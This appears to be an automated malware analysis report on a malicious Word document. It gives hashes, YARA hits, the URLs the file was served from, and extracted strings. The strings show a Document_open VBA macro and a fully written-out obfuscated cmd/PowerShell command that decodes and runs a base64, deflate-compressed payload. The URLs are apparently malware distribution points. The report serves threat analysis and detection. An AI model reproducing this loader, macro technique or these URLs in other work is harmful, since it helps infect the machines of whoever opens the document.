Sample details: 4f781bd8469b6e5f337dca97e4dc3d41 --

Hashes
MD5: 4f781bd8469b6e5f337dca97e4dc3d41
SHA1: 8e4963d3cdc63e4fa13ad6dc39c92b2e1171f67c
SHA256: ea7d53b1b0c0425871b2cad02ea8242e849f07fcda6f989752476283c595e57e
SSDEEP: 768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GYLerHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tpTiLI
Details
File Type: Composite
Yara Hits
YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | FlorianRoth/PowerShell_Case_Anomaly |
Source
http://www.waverunnerball.com/EN_US/Payments/11_18/
http://exictos.ligaempresarial.pt/EN_US/Attachments/112018/
http://exictos.ligaempresarial.pt/EN_US/Attachments/112018
http://numidiatalent.com/EN_US/Payments/112018/
http://www.waverunnerball.com/EN_US/Payments/11_18
http://waverunnerball.com/EN_US/Payments/11_18
http://waverunnerball.com/EN_US/Payments/11_18/
http://numidiatalent.com/EN_US/Payments/112018
Strings
		CMD c:\wINDOWs\SySteM32\cMd.eXE   /c"seT   oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&&   POwErSheLL  Set-ITem (\"VAriAB\"  +\"Le:zl\" +  \"AH\"  + \"3g\") (   [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' )   )   ;(  ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti'  )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN'  ).Invoke(   ( ${z`lAh3g}::(  \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))"
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
PKW}Rn
LzS.![
9.O@=s
\aQBQqo{4
9B7yhT
#+PzQE
{_69bw2
ZTjAN<
iVm:_1Vh
<7^+UPn
D`Ncl)=
u|\^,2
t]kZV`
D[f$[O
bO*p8<S
]u/h>&
us,z|~M
H!g>\.
Zg.Dj6
sA$nCCt
MFM]Y5
V_=v>`y
~enW.n
T'B5jA
 Xl@+,@
p0+Z<CJ
Z3I95g
;\m`=H<
RDl@*W
`XyL203
]b-NX%
P1eV_Q\
@&g$aB#
[{t_qn
\g+;kUB
_[_YEs
=79+G<
sY7m/u
?}ZWM%e
tW$x3+Q
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
*j/:D7
drs/downrev.xmlL
@/8lR#
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
Bailey-PC
Attribut
e VB_Nam
e = "SnB
hWjGjA"
ormal.Th
isDocume
VGlobaBl
Cre atabl
Pr@edecla
plateDer
$Custo
  Sub 
n Error 
meValue 
ZCLMhS +
 VzcwZ *
 (sIuRmF
sXGKPu
 dajZC
fA8wza
nt - Oot(fpY
er (LLJb
sJuKBOA
LlKlmW
:A.  TvCrw@
 / FrLzr
udZbDS
 (zsls
vwOVLn ChmBW
pSh@ell(""@
l@zdUQBw
V@jYrZGH
hapes(MA@cvpuzl@
XCnRQA
@fCaofb
MDfqUBw)d.T
R0angeB
ENTvHb
, 767051x443
AXHpAOJhf
GNAhKVI
>@cOJdZq@
CbsvBj
vB5ElMJt)C
ajjEGA
jaGora!@
XfP8ZzllLA
FVJRC`
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
SnBhWjGjA
Document_open
TimeValue
ZCLMhS
sIuRmF)L
sXGKPu
fAwzazc
dDcfNj^
awJntR
OotfpY
QzcwGL
FormatNumber/
LLJbsi 
nIuCOz
sJuKBO9
lFCwE5E
FormatDateTimeG
XrhiTF
jCwBzn
udZbDS
zslsCfy
wVwzAD
dYIYXf]
vkofjk
vwOVLnChmBW
ShellV
lzdUQBwr)
VjYrZGH
Shapes
MAcvpuzlT
WXCnRQl
fCaofbj
UMDfqUBw
TextFrame
TextRange
oZQPiu
lAXHpO
JhfVZJ?p
dwJbwA3
NAhKVI
cOJdZq_
iwCMpZ
coXQDk
CbsvjHdm
Rojvzl
iRjlIl
jaGora
dGmqwx
UzZTfn
MjZCXf
ZzllLwS
FVJRCYY
rhhmVHt
mHPnsf<A
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
9SnBhWjG jAG
*\CNormalrU
ThisDocument
Project
SnBhWjGjA
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
Document_open
SnBhWjGjA
ID="{684E4B22-8917-4E79-A4E1-872FDC61E61C}"
Document=SnBhWjGjA/&H00000000
ExeName32="tVJpnLAGznZZ"
Name="Project"
HelpContexP
tID="0"
VersionCompatible32="393222000"
CMG="CFCD11E7117F5983598359835983"
DPB="1B19C5BB10BC10BC10"
GC="6765B90F4917941894186B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
SnBhWjGjA=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Bailey-PC